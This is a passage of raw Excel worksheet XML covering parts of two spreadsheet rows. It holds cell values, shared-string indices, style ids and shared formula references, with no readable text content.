        <v>0</v>
      </c>
      <c r="NE33" s="117">
        <v>0</v>
      </c>
      <c r="NF33" s="118">
        <v>0</v>
      </c>
      <c r="NG33" s="507">
        <v>0</v>
      </c>
      <c r="NH33" s="119">
        <v>0</v>
      </c>
      <c r="NI33" s="119">
        <v>0</v>
      </c>
      <c r="NJ33" s="119">
        <v>0</v>
      </c>
      <c r="NK33" s="117">
        <v>5</v>
      </c>
      <c r="NL33" s="118" t="s">
        <v>4189</v>
      </c>
      <c r="NM33" s="507">
        <v>5</v>
      </c>
      <c r="NN33" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO33" s="119">
        <v>1</v>
      </c>
      <c r="NP33" s="119">
        <v>5</v>
      </c>
      <c r="NQ33" s="117">
        <v>0</v>
      </c>
      <c r="NR33" s="118">
        <v>0</v>
      </c>
      <c r="NS33" s="507">
        <v>0</v>
      </c>
      <c r="NT33" s="119">
        <v>0</v>
      </c>
      <c r="NU33" s="119">
        <v>0</v>
      </c>
      <c r="NV33" s="119">
        <v>0</v>
      </c>
      <c r="NW33" s="117">
        <v>3</v>
      </c>
      <c r="NX33" s="118" t="s">
        <v>4345</v>
      </c>
      <c r="NY33" s="507">
        <v>3</v>
      </c>
      <c r="NZ33" s="119" t="s">
        <v>4346</v>
      </c>
      <c r="OA33" s="119">
        <v>2</v>
      </c>
      <c r="OB33" s="119">
        <v>3</v>
      </c>
      <c r="OC33" s="120">
        <v>5</v>
      </c>
      <c r="OD33" s="120">
        <v>5</v>
      </c>
      <c r="OE33" s="120">
        <v>1</v>
      </c>
      <c r="OF33" s="121">
        <v>1</v>
      </c>
      <c r="OG33" s="120">
        <v>5</v>
      </c>
      <c r="OH33" s="120">
        <v>5</v>
      </c>
      <c r="OI33" s="120">
        <v>5</v>
      </c>
      <c r="OJ33" s="120">
        <v>5</v>
      </c>
      <c r="OK33" s="383"/>
      <c r="OL33" s="120">
        <v>5</v>
      </c>
      <c r="OM33" s="120">
        <v>5</v>
      </c>
      <c r="ON33" s="120">
        <v>5</v>
      </c>
      <c r="OO33" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP33" s="120">
        <v>1</v>
      </c>
      <c r="OQ33" s="464">
        <v>5</v>
      </c>
      <c r="OR33" s="120">
        <v>0</v>
      </c>
      <c r="OS33" s="120">
        <v>0</v>
      </c>
      <c r="OT33" s="120">
        <v>0</v>
      </c>
      <c r="OU33" s="120"/>
      <c r="OV33" s="120">
        <v>0</v>
      </c>
      <c r="OW33" s="464">
        <v>0</v>
      </c>
      <c r="OX33" s="120">
        <v>0</v>
      </c>
      <c r="OY33" s="120">
        <v>0</v>
      </c>
      <c r="OZ33" s="120">
        <v>0</v>
      </c>
      <c r="PA33" s="120"/>
      <c r="PB33" s="120">
        <v>0</v>
      </c>
      <c r="PC33" s="464">
        <v>0</v>
      </c>
      <c r="PD33" s="120">
        <v>0</v>
      </c>
      <c r="PE33" s="120">
        <v>0</v>
      </c>
      <c r="PF33" s="120">
        <v>0</v>
      </c>
      <c r="PG33" s="120"/>
      <c r="PH33" s="120">
        <v>0</v>
      </c>
      <c r="PI33" s="464">
        <v>0</v>
      </c>
      <c r="PJ33" s="120">
        <v>0</v>
      </c>
      <c r="PK33" s="120">
        <v>0</v>
      </c>
      <c r="PL33" s="120">
        <v>0</v>
      </c>
      <c r="PM33" s="120"/>
      <c r="PN33" s="120">
        <v>0</v>
      </c>
      <c r="PO33" s="464">
        <v>0</v>
      </c>
      <c r="PP33" s="120">
        <v>0</v>
      </c>
      <c r="PQ33" s="120">
        <v>0</v>
      </c>
      <c r="PR33" s="120">
        <v>0</v>
      </c>
      <c r="PS33" s="120"/>
      <c r="PT33" s="120">
        <v>0</v>
      </c>
      <c r="PU33" s="464">
        <v>0</v>
      </c>
      <c r="PV33" s="120">
        <v>0</v>
      </c>
      <c r="PW33" s="120">
        <v>0</v>
      </c>
      <c r="PX33" s="120">
        <v>0</v>
      </c>
      <c r="PY33" s="120"/>
      <c r="PZ33" s="120">
        <v>0</v>
      </c>
      <c r="QA33" s="464">
        <v>0</v>
      </c>
      <c r="QB33" s="120">
        <v>0</v>
      </c>
      <c r="QC33" s="120">
        <v>0</v>
      </c>
      <c r="QD33" s="120">
        <v>0</v>
      </c>
      <c r="QE33" s="120"/>
      <c r="QF33" s="120">
        <v>0</v>
      </c>
      <c r="QG33" s="464">
        <v>0</v>
      </c>
      <c r="QH33" s="120">
        <v>5</v>
      </c>
      <c r="QI33" s="120">
        <v>5</v>
      </c>
      <c r="QJ33" s="120">
        <v>5</v>
      </c>
      <c r="QK33" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL33" s="120">
        <v>1</v>
      </c>
      <c r="QM33" s="464">
        <v>5</v>
      </c>
      <c r="QN33" s="120">
        <v>0</v>
      </c>
      <c r="QO33" s="120">
        <v>0</v>
      </c>
      <c r="QP33" s="120">
        <v>0</v>
      </c>
      <c r="QQ33" s="120"/>
      <c r="QR33" s="120">
        <v>0</v>
      </c>
      <c r="QS33" s="464">
        <v>0</v>
      </c>
      <c r="QT33" s="184"/>
      <c r="QU33" s="184"/>
      <c r="QV33" s="184"/>
      <c r="QW33" s="184"/>
      <c r="QX33" s="184"/>
      <c r="QY33" s="184"/>
      <c r="QZ33" s="184"/>
      <c r="RA33" s="184"/>
      <c r="RB33" s="184"/>
      <c r="RC33" s="184"/>
      <c r="RD33" s="184"/>
      <c r="RE33" s="184"/>
      <c r="RF33" s="184"/>
      <c r="RG33" s="184"/>
      <c r="RH33" s="184"/>
      <c r="RI33" s="184"/>
      <c r="RJ33" s="184"/>
      <c r="RK33" s="184"/>
      <c r="RL33" s="184"/>
      <c r="RM33" s="184"/>
      <c r="RN33" s="184"/>
      <c r="RO33" s="184"/>
      <c r="RP33" s="184"/>
      <c r="RQ33" s="184"/>
      <c r="RR33" s="184"/>
      <c r="RS33" s="184"/>
      <c r="RT33" s="184"/>
      <c r="RU33" s="184"/>
      <c r="RV33" s="184"/>
      <c r="RW33" s="184"/>
      <c r="RX33" s="184"/>
      <c r="RY33" s="184"/>
      <c r="RZ33" s="184"/>
      <c r="SA33" s="184"/>
      <c r="SB33" s="184"/>
      <c r="SC33" s="184"/>
      <c r="SD33" s="184"/>
      <c r="SE33" s="184"/>
      <c r="SF33" s="184"/>
      <c r="SG33" s="184"/>
      <c r="SH33" s="184"/>
      <c r="SI33" s="184"/>
      <c r="SJ33" s="184"/>
      <c r="SK33" s="184"/>
      <c r="SL33" s="184"/>
      <c r="SM33" s="184"/>
      <c r="SN33" s="184"/>
      <c r="SO33" s="184"/>
      <c r="SP33" s="184"/>
      <c r="SQ33" s="184"/>
      <c r="SR33" s="184"/>
      <c r="SS33" s="184"/>
      <c r="ST33" s="184"/>
      <c r="SU33" s="184"/>
      <c r="SV33" s="184"/>
      <c r="SW33" s="184"/>
      <c r="SX33" s="184"/>
      <c r="SY33" s="184"/>
      <c r="SZ33" s="184"/>
      <c r="TA33" s="184"/>
      <c r="TB33" s="184"/>
      <c r="TC33" s="184"/>
      <c r="TD33" s="184"/>
      <c r="TE33" s="184"/>
      <c r="TF33" s="184"/>
      <c r="TG33" s="184"/>
      <c r="TH33" s="184"/>
      <c r="TI33" s="184"/>
      <c r="TJ33" s="184"/>
      <c r="TK33" s="184"/>
      <c r="TL33" s="184"/>
      <c r="TM33" s="184"/>
      <c r="TN33" s="184"/>
      <c r="TO33" s="184"/>
      <c r="TP33" s="184"/>
      <c r="TQ33" s="184"/>
      <c r="TR33" s="184"/>
      <c r="TS33" s="184"/>
      <c r="TT33" s="184"/>
      <c r="TU33" s="184"/>
      <c r="TV33" s="184"/>
      <c r="TW33" s="184"/>
      <c r="TX33" s="184"/>
      <c r="TY33" s="184"/>
      <c r="TZ33" s="184"/>
      <c r="UA33" s="184"/>
      <c r="UB33" s="184"/>
      <c r="UC33" s="184"/>
      <c r="UD33" s="184"/>
      <c r="UE33" s="184"/>
      <c r="UF33" s="184"/>
      <c r="UG33" s="184"/>
      <c r="UH33" s="184"/>
      <c r="UI33" s="184"/>
      <c r="UJ33" s="184"/>
      <c r="UK33" s="184"/>
      <c r="UL33" s="184"/>
      <c r="UM33" s="184"/>
      <c r="UN33" s="184"/>
      <c r="UO33" s="184"/>
      <c r="UP33" s="184"/>
      <c r="UQ33" s="184"/>
      <c r="UR33" s="184"/>
      <c r="US33" s="184"/>
      <c r="UT33" s="184"/>
      <c r="UU33" s="184"/>
      <c r="UV33" s="184"/>
      <c r="UW33" s="184"/>
      <c r="UX33" s="184"/>
      <c r="UY33" s="184"/>
      <c r="UZ33" s="184"/>
      <c r="VA33" s="184"/>
      <c r="VB33" s="184"/>
      <c r="VC33" s="184"/>
      <c r="VD33" s="184"/>
      <c r="VE33" s="184"/>
      <c r="VF33" s="184"/>
      <c r="VG33" s="184"/>
      <c r="VH33" s="184"/>
      <c r="VI33" s="184"/>
      <c r="VJ33" s="184"/>
      <c r="VK33" s="184"/>
      <c r="VL33" s="184"/>
      <c r="VM33" s="184"/>
      <c r="VN33" s="184"/>
      <c r="VO33" s="184"/>
      <c r="VP33" s="184"/>
      <c r="VQ33" s="184"/>
      <c r="VR33" s="184"/>
      <c r="VS33" s="184"/>
      <c r="VT33" s="184"/>
      <c r="VU33" s="184"/>
      <c r="VV33" s="184"/>
      <c r="VW33" s="184"/>
      <c r="VX33" s="184"/>
      <c r="VY33" s="184"/>
    </row>
    <row r="34" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A34" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B34" s="83" t="s">
        <v>44</v>
      </c>
      <c r="C34" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D34" s="83" t="s">
        <v>73</v>
      </c>
      <c r="E34" s="83">
        <f t="shared" si="2"/>
        <v>28</v>
      </c>
      <c r="F34" s="83" t="s">
        <v>74</v>
      </c>
      <c r="G34" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H34" s="197" t="s">
        <v>4</v>
      </c>
      <c r="I34" s="81" t="s">
        <v>1067</v>
      </c>
      <c r="J34" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K34" s="81" t="s">
        <v>1068</v>
      </c>
      <c r="L34" s="81" t="s">
        <v>1069</v>
      </c>
      <c r="M34" s="378" t="s">
        <v>208</v>
      </c>
      <c r="N34" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O34" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P34" s="91"/>
      <c r="Q34" s="379" t="s">
        <v>841</v>
      </c>
      <c r="R34" s="92" t="s">
        <v>1070</v>
      </c>
      <c r="S34" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T34" s="92" t="s">
        <v>1071</v>
      </c>
      <c r="U34" s="94" t="s">
        <v>1072</v>
      </c>
      <c r="V34" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W34" s="96" t="s">
        <v>1073</v>
      </c>
      <c r="X34" s="97" t="s">
        <v>1074</v>
      </c>
      <c r="Y34" s="83" t="s">
        <v>1075</v>
      </c>
      <c r="Z34" s="98" t="s">
        <v>1076</v>
      </c>
      <c r="AA34" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB34" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC34" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD34" s="83"/>
      <c r="AE34" s="83"/>
      <c r="AF34" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG34" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH34" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI34" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ34" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK34" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL34" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM34" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN34" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO34" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP34" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ34" s="358">
        <v>32</v>
      </c>
      <c r="AR34" s="100"/>
      <c r="AS34" s="100">
        <v>1</v>
      </c>
      <c r="AT34" s="100">
        <v>0</v>
      </c>
      <c r="AU34" s="100">
        <v>1</v>
      </c>
      <c r="AV34" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW34" s="100">
        <v>1</v>
      </c>
      <c r="AX34" s="100">
        <v>1</v>
      </c>
      <c r="AY34" s="100">
        <v>0</v>
      </c>
      <c r="AZ34" s="100">
        <v>1</v>
      </c>
      <c r="BA34" s="381" t="s">
        <v>4881</v>
      </c>
      <c r="BB34" s="101">
        <v>0</v>
      </c>
      <c r="BC34" s="102">
        <v>0</v>
      </c>
      <c r="BD34" s="102">
        <v>0</v>
      </c>
      <c r="BE34" s="103">
        <v>0</v>
      </c>
      <c r="BF34" s="103">
        <v>0</v>
      </c>
      <c r="BG34" s="104">
        <v>0</v>
      </c>
      <c r="BH34" s="105">
        <v>0</v>
      </c>
      <c r="BI34" s="106">
        <v>0</v>
      </c>
      <c r="BJ34" s="497">
        <v>0</v>
      </c>
      <c r="BK34" s="107">
        <v>0</v>
      </c>
      <c r="BL34" s="107">
        <v>0</v>
      </c>
      <c r="BM34" s="108">
        <v>0</v>
      </c>
      <c r="BN34" s="109">
        <v>0</v>
      </c>
      <c r="BO34" s="110">
        <v>0</v>
      </c>
      <c r="BP34" s="501">
        <v>0</v>
      </c>
      <c r="BQ34" s="111">
        <v>0</v>
      </c>
      <c r="BR34" s="111">
        <v>0</v>
      </c>
      <c r="BS34" s="112">
        <v>0</v>
      </c>
      <c r="BT34" s="113">
        <v>18</v>
      </c>
      <c r="BU34" s="114" t="s">
        <v>3034</v>
      </c>
      <c r="BV34" s="503">
        <v>8</v>
      </c>
      <c r="BW34" s="115" t="s">
        <v>3035</v>
      </c>
      <c r="BX34" s="115">
        <v>3</v>
      </c>
      <c r="BY34" s="116">
        <v>8</v>
      </c>
      <c r="BZ34" s="250">
        <v>4</v>
      </c>
      <c r="CA34" s="251" t="s">
        <v>1906</v>
      </c>
      <c r="CB34" s="505">
        <v>3</v>
      </c>
      <c r="CC34" s="252" t="s">
        <v>1907</v>
      </c>
      <c r="CD34" s="252">
        <v>2</v>
      </c>
      <c r="CE34" s="253">
        <v>3</v>
      </c>
      <c r="CF34" s="101">
        <v>22</v>
      </c>
      <c r="CG34" s="102" t="s">
        <v>3036</v>
      </c>
      <c r="CH34" s="102">
        <v>11</v>
      </c>
      <c r="CI34" s="103" t="s">
        <v>3037</v>
      </c>
      <c r="CJ34" s="103">
        <v>5</v>
      </c>
      <c r="CK34" s="104">
        <v>9</v>
      </c>
      <c r="CL34" s="105">
        <v>0</v>
      </c>
      <c r="CM34" s="106">
        <v>0</v>
      </c>
      <c r="CN34" s="497">
        <v>0</v>
      </c>
      <c r="CO34" s="107">
        <v>0</v>
      </c>
      <c r="CP34" s="107">
        <v>0</v>
      </c>
      <c r="CQ34" s="108">
        <v>0</v>
      </c>
      <c r="CR34" s="109">
        <v>14</v>
      </c>
      <c r="CS34" s="110" t="s">
        <v>2147</v>
      </c>
      <c r="CT34" s="501">
        <v>5</v>
      </c>
      <c r="CU34" s="111" t="s">
        <v>2148</v>
      </c>
      <c r="CV34" s="111">
        <v>2</v>
      </c>
      <c r="CW34" s="112">
        <v>5</v>
      </c>
      <c r="CX34" s="113">
        <v>14</v>
      </c>
      <c r="CY34" s="114" t="s">
        <v>2147</v>
      </c>
      <c r="CZ34" s="503">
        <v>5</v>
      </c>
      <c r="DA34" s="115" t="s">
        <v>2148</v>
      </c>
      <c r="DB34" s="115">
        <v>2</v>
      </c>
      <c r="DC34" s="116">
        <v>5</v>
      </c>
      <c r="DD34" s="101">
        <v>0</v>
      </c>
      <c r="DE34" s="102">
        <v>0</v>
      </c>
      <c r="DF34" s="102">
        <v>0</v>
      </c>
      <c r="DG34" s="103">
        <v>0</v>
      </c>
      <c r="DH34" s="103">
        <v>0</v>
      </c>
      <c r="DI34" s="104">
        <v>0</v>
      </c>
      <c r="DJ34" s="105">
        <v>0</v>
      </c>
      <c r="DK34" s="106">
        <v>0</v>
      </c>
      <c r="DL34" s="497">
        <v>0</v>
      </c>
      <c r="DM34" s="107">
        <v>0</v>
      </c>
      <c r="DN34" s="107">
        <v>0</v>
      </c>
      <c r="DO34" s="108">
        <v>0</v>
      </c>
      <c r="DP34" s="109">
        <v>0</v>
      </c>
      <c r="DQ34" s="110">
        <v>0</v>
      </c>
      <c r="DR34" s="501">
        <v>0</v>
      </c>
      <c r="DS34" s="111">
        <v>0</v>
      </c>
      <c r="DT34" s="111">
        <v>0</v>
      </c>
      <c r="DU34" s="112">
        <v>0</v>
      </c>
      <c r="DV34" s="113">
        <v>0</v>
      </c>
      <c r="DW34" s="114">
        <v>0</v>
      </c>
      <c r="DX34" s="503">
        <v>0</v>
      </c>
      <c r="DY34" s="115">
        <v>0</v>
      </c>
      <c r="DZ34" s="115">
        <v>0</v>
      </c>
      <c r="EA34" s="116">
        <v>0</v>
      </c>
      <c r="EB34" s="250">
        <v>0</v>
      </c>
      <c r="EC34" s="251">
        <v>0</v>
      </c>
      <c r="ED34" s="505">
        <v>0</v>
      </c>
      <c r="EE34" s="252">
        <v>0</v>
      </c>
      <c r="EF34" s="252">
        <v>0</v>
      </c>
      <c r="EG34" s="253">
        <v>0</v>
      </c>
      <c r="EH34" s="101">
        <v>0</v>
      </c>
      <c r="EI34" s="102">
        <v>0</v>
      </c>
      <c r="EJ34" s="102">
        <v>0</v>
      </c>
      <c r="EK34" s="103">
        <v>0</v>
      </c>
      <c r="EL34" s="103">
        <v>0</v>
      </c>
      <c r="EM34" s="104">
        <v>0</v>
      </c>
      <c r="EN34" s="105">
        <v>0</v>
      </c>
      <c r="EO34" s="106">
        <v>0</v>
      </c>
      <c r="EP34" s="497">
        <v>0</v>
      </c>
      <c r="EQ34" s="107">
        <v>0</v>
      </c>
      <c r="ER34" s="107">
        <v>0</v>
      </c>
      <c r="ES34" s="108">
        <v>0</v>
      </c>
      <c r="ET34" s="109">
        <v>0</v>
      </c>
      <c r="EU34" s="110">
        <v>0</v>
      </c>
      <c r="EV34" s="501">
        <v>0</v>
      </c>
      <c r="EW34" s="111">
        <v>0</v>
      </c>
      <c r="EX34" s="111">
        <v>0</v>
      </c>
      <c r="EY34" s="112">
        <v>0</v>
      </c>
      <c r="EZ34" s="113">
        <v>0</v>
      </c>
      <c r="FA34" s="114">
        <v>0</v>
      </c>
      <c r="FB34" s="503">
        <v>0</v>
      </c>
      <c r="FC34" s="115">
        <v>0</v>
      </c>
      <c r="FD34" s="115">
        <v>0</v>
      </c>
      <c r="FE34" s="116">
        <v>0</v>
      </c>
      <c r="FF34" s="101">
        <v>0</v>
      </c>
      <c r="FG34" s="102">
        <v>0</v>
      </c>
      <c r="FH34" s="102">
        <v>0</v>
      </c>
      <c r="FI34" s="103">
        <v>0</v>
      </c>
      <c r="FJ34" s="103">
        <v>0</v>
      </c>
      <c r="FK34" s="104">
        <v>0</v>
      </c>
      <c r="FL34" s="105">
        <v>0</v>
      </c>
      <c r="FM34" s="106">
        <v>0</v>
      </c>
      <c r="FN34" s="497">
        <v>0</v>
      </c>
      <c r="FO34" s="107">
        <v>0</v>
      </c>
      <c r="FP34" s="107">
        <v>0</v>
      </c>
      <c r="FQ34" s="108">
        <v>0</v>
      </c>
      <c r="FR34" s="109">
        <v>0</v>
      </c>
      <c r="FS34" s="110">
        <v>0</v>
      </c>
      <c r="FT34" s="501">
        <v>0</v>
      </c>
      <c r="FU34" s="111">
        <v>0</v>
      </c>
      <c r="FV34" s="111">
        <v>0</v>
      </c>
      <c r="FW34" s="112">
        <v>0</v>
      </c>
      <c r="FX34" s="113">
        <v>1</v>
      </c>
      <c r="FY34" s="114" t="s">
        <v>1946</v>
      </c>
      <c r="FZ34" s="503">
        <v>1</v>
      </c>
      <c r="GA34" s="115" t="s">
        <v>1947</v>
      </c>
      <c r="GB34" s="115">
        <v>1</v>
      </c>
      <c r="GC34" s="116">
        <v>1</v>
      </c>
      <c r="GD34" s="250">
        <v>4</v>
      </c>
      <c r="GE34" s="251" t="s">
        <v>1906</v>
      </c>
      <c r="GF34" s="505">
        <v>3</v>
      </c>
      <c r="GG34" s="252" t="s">
        <v>1907</v>
      </c>
      <c r="GH34" s="252">
        <v>2</v>
      </c>
      <c r="GI34" s="253">
        <v>3</v>
      </c>
      <c r="GJ34" s="101">
        <v>5</v>
      </c>
      <c r="GK34" s="102" t="s">
        <v>3038</v>
      </c>
      <c r="GL34" s="102">
        <v>4</v>
      </c>
      <c r="GM34" s="103" t="s">
        <v>3039</v>
      </c>
      <c r="GN34" s="103">
        <v>3</v>
      </c>
      <c r="GO34" s="104">
        <v>4</v>
      </c>
      <c r="GP34" s="105">
        <v>0</v>
      </c>
      <c r="GQ34" s="106">
        <v>0</v>
      </c>
      <c r="GR34" s="497">
        <v>0</v>
      </c>
      <c r="GS34" s="107">
        <v>0</v>
      </c>
      <c r="GT34" s="107">
        <v>0</v>
      </c>
      <c r="GU34" s="108">
        <v>0</v>
      </c>
      <c r="GV34" s="109">
        <v>1</v>
      </c>
      <c r="GW34" s="110" t="s">
        <v>1946</v>
      </c>
      <c r="GX34" s="501">
        <v>1</v>
      </c>
      <c r="GY34" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="GZ34" s="111">
        <v>1</v>
      </c>
      <c r="HA34" s="112">
        <v>1</v>
      </c>
      <c r="HB34" s="113">
        <v>1</v>
      </c>
      <c r="HC34" s="114" t="s">
        <v>1946</v>
      </c>
      <c r="HD34" s="503">
        <v>1</v>
      </c>
      <c r="HE34" s="115" t="s">
        <v>1947</v>
      </c>
      <c r="HF34" s="115">
        <v>1</v>
      </c>
      <c r="HG34" s="116">
        <v>1</v>
      </c>
      <c r="HH34" s="101">
        <v>0</v>
      </c>
      <c r="HI34" s="102">
        <v>0</v>
      </c>
      <c r="HJ34" s="102">
        <v>0</v>
      </c>
      <c r="HK34" s="103">
        <v>0</v>
      </c>
      <c r="HL34" s="103">
        <v>0</v>
      </c>
      <c r="HM34" s="104">
        <v>0</v>
      </c>
      <c r="HN34" s="105">
        <v>0</v>
      </c>
      <c r="HO34" s="106">
        <v>0</v>
      </c>
      <c r="HP34" s="497">
        <v>0</v>
      </c>
      <c r="HQ34" s="107">
        <v>0</v>
      </c>
      <c r="HR34" s="107">
        <v>0</v>
      </c>
      <c r="HS34" s="108">
        <v>0</v>
      </c>
      <c r="HT34" s="109">
        <v>0</v>
      </c>
      <c r="HU34" s="110">
        <v>0</v>
      </c>
      <c r="HV34" s="501">
        <v>0</v>
      </c>
      <c r="HW34" s="111">
        <v>0</v>
      </c>
      <c r="HX34" s="111">
        <v>0</v>
      </c>
      <c r="HY34" s="112">
        <v>0</v>
      </c>
      <c r="HZ34" s="113">
        <v>17</v>
      </c>
      <c r="IA34" s="114" t="s">
        <v>3040</v>
      </c>
      <c r="IB34" s="503">
        <v>7</v>
      </c>
      <c r="IC34" s="115" t="s">
        <v>3041</v>
      </c>
      <c r="ID34" s="115">
        <v>2</v>
      </c>
      <c r="IE34" s="116">
        <v>7</v>
      </c>
      <c r="IF34" s="250">
        <v>0</v>
      </c>
      <c r="IG34" s="251">
        <v>0</v>
      </c>
      <c r="IH34" s="505">
        <v>0</v>
      </c>
      <c r="II34" s="252">
        <v>0</v>
      </c>
      <c r="IJ34" s="252">
        <v>0</v>
      </c>
      <c r="IK34" s="253">
        <v>0</v>
      </c>
      <c r="IL34" s="101">
        <v>17</v>
      </c>
      <c r="IM34" s="102" t="s">
        <v>3040</v>
      </c>
      <c r="IN34" s="102">
        <v>7</v>
      </c>
      <c r="IO34" s="103" t="s">
        <v>3041</v>
      </c>
      <c r="IP34" s="103">
        <v>2</v>
      </c>
      <c r="IQ34" s="104">
        <v>7</v>
      </c>
      <c r="IR34" s="105">
        <v>0</v>
      </c>
      <c r="IS34" s="106">
        <v>0</v>
      </c>
      <c r="IT34" s="497">
        <v>0</v>
      </c>
      <c r="IU34" s="107">
        <v>0</v>
      </c>
      <c r="IV34" s="107">
        <v>0</v>
      </c>
      <c r="IW34" s="108">
        <v>0</v>
      </c>
      <c r="IX34" s="109">
        <v>13</v>
      </c>
      <c r="IY34" s="110" t="s">
        <v>3042</v>
      </c>
      <c r="IZ34" s="501">
        <v>4</v>
      </c>
      <c r="JA34" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="JB34" s="111">
        <v>1</v>
      </c>
      <c r="JC34" s="112">
        <v>4</v>
      </c>
      <c r="JD34" s="113">
        <v>13</v>
      </c>
      <c r="JE34" s="114" t="s">
        <v>3042</v>
      </c>
      <c r="JF34" s="503">
        <v>4</v>
      </c>
      <c r="JG34" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="JH34" s="115">
        <v>1</v>
      </c>
      <c r="JI34" s="116">
        <v>4</v>
      </c>
      <c r="JJ34" s="101">
        <v>0</v>
      </c>
      <c r="JK34" s="102">
        <v>0</v>
      </c>
      <c r="JL34" s="102">
        <v>0</v>
      </c>
      <c r="JM34" s="103">
        <v>0</v>
      </c>
      <c r="JN34" s="103">
        <v>0</v>
      </c>
      <c r="JO34" s="104">
        <v>0</v>
      </c>
      <c r="JP34" s="105">
        <v>0</v>
      </c>
      <c r="JQ34" s="106">
        <v>0</v>
      </c>
      <c r="JR34" s="497">
        <v>0</v>
      </c>
      <c r="JS34" s="107">
        <v>0</v>
      </c>
      <c r="JT34" s="107">
        <v>0</v>
      </c>
      <c r="JU34" s="108">
        <v>0</v>
      </c>
      <c r="JV34" s="109">
        <v>0</v>
      </c>
      <c r="JW34" s="110">
        <v>0</v>
      </c>
      <c r="JX34" s="501">
        <v>0</v>
      </c>
      <c r="JY34" s="111">
        <v>0</v>
      </c>
      <c r="JZ34" s="111">
        <v>0</v>
      </c>
      <c r="KA34" s="112">
        <v>0</v>
      </c>
      <c r="KB34" s="113">
        <v>0</v>
      </c>
      <c r="KC34" s="114">
        <v>0</v>
      </c>
      <c r="KD34" s="503">
        <v>0</v>
      </c>
      <c r="KE34" s="115">
        <v>0</v>
      </c>
      <c r="KF34" s="115">
        <v>0</v>
      </c>
      <c r="KG34" s="116">
        <v>0</v>
      </c>
      <c r="KH34" s="250">
        <v>0</v>
      </c>
      <c r="KI34" s="251">
        <v>0</v>
      </c>
      <c r="KJ34" s="505">
        <v>0</v>
      </c>
      <c r="KK34" s="252">
        <v>0</v>
      </c>
      <c r="KL34" s="252">
        <v>0</v>
      </c>
      <c r="KM34" s="253">
        <v>0</v>
      </c>
      <c r="KN34" s="101">
        <v>0</v>
      </c>
      <c r="KO34" s="102">
        <v>0</v>
      </c>
      <c r="KP34" s="102">
        <v>0</v>
      </c>
      <c r="KQ34" s="103">
        <v>0</v>
      </c>
      <c r="KR34" s="103">
        <v>0</v>
      </c>
      <c r="KS34" s="104">
        <v>0</v>
      </c>
      <c r="KT34" s="105">
        <v>0</v>
      </c>
      <c r="KU34" s="106">
        <v>0</v>
      </c>
      <c r="KV34" s="497">
        <v>0</v>
      </c>
      <c r="KW34" s="107">
        <v>0</v>
      </c>
      <c r="KX34" s="107">
        <v>0</v>
      </c>
      <c r="KY34" s="108">
        <v>0</v>
      </c>
      <c r="KZ34" s="109">
        <v>0</v>
      </c>
      <c r="LA34" s="110">
        <v>0</v>
      </c>
      <c r="LB34" s="501">
        <v>0</v>
      </c>
      <c r="LC34" s="111">
        <v>0</v>
      </c>
      <c r="LD34" s="111">
        <v>0</v>
      </c>
      <c r="LE34" s="112">
        <v>0</v>
      </c>
      <c r="LF34" s="113">
        <v>0</v>
      </c>
      <c r="LG34" s="114">
        <v>0</v>
      </c>
      <c r="LH34" s="503">
        <v>0</v>
      </c>
      <c r="LI34" s="115">
        <v>0</v>
      </c>
      <c r="LJ34" s="115">
        <v>0</v>
      </c>
      <c r="LK34" s="116">
        <v>0</v>
      </c>
      <c r="LL34" s="117">
        <v>32</v>
      </c>
      <c r="LM34" s="507">
        <v>30</v>
      </c>
      <c r="LN34" s="119">
        <v>0</v>
      </c>
      <c r="LO34" s="119">
        <v>7</v>
      </c>
      <c r="LP34" s="119">
        <v>30</v>
      </c>
      <c r="LQ34" s="119">
        <v>0</v>
      </c>
      <c r="LR34" s="119">
        <v>30</v>
      </c>
      <c r="LS34" s="119">
        <v>30</v>
      </c>
      <c r="LT34" s="382"/>
      <c r="LU34" s="117">
        <v>0</v>
      </c>
      <c r="LV34" s="118">
        <v>0</v>
      </c>
      <c r="LW34" s="507">
        <v>0</v>
      </c>
      <c r="LX34" s="119">
        <v>0</v>
      </c>
      <c r="LY34" s="119">
        <v>0</v>
      </c>
      <c r="LZ34" s="119">
        <v>0</v>
      </c>
      <c r="MA34" s="117">
        <v>0</v>
      </c>
      <c r="MB34" s="118">
        <v>0</v>
      </c>
      <c r="MC34" s="507">
        <v>0</v>
      </c>
      <c r="MD34" s="119">
        <v>0</v>
      </c>
      <c r="ME34" s="119">
        <v>0</v>
      </c>
      <c r="MF34" s="119">
        <v>0</v>
      </c>
      <c r="MG34" s="117">
        <v>0</v>
      </c>
      <c r="MH34" s="118">
        <v>0</v>
      </c>
      <c r="MI34" s="507">
        <v>0</v>
      </c>
      <c r="MJ34" s="119">
        <v>0</v>
      </c>
      <c r="MK34" s="119">
        <v>0</v>
      </c>
      <c r="ML34" s="119">
        <v>0</v>
      </c>
      <c r="MM34" s="117">
        <v>0</v>
      </c>
      <c r="MN34" s="118">
        <v>0</v>
      </c>
      <c r="MO34" s="507">
        <v>0</v>
      </c>
      <c r="MP34" s="119">
        <v>0</v>
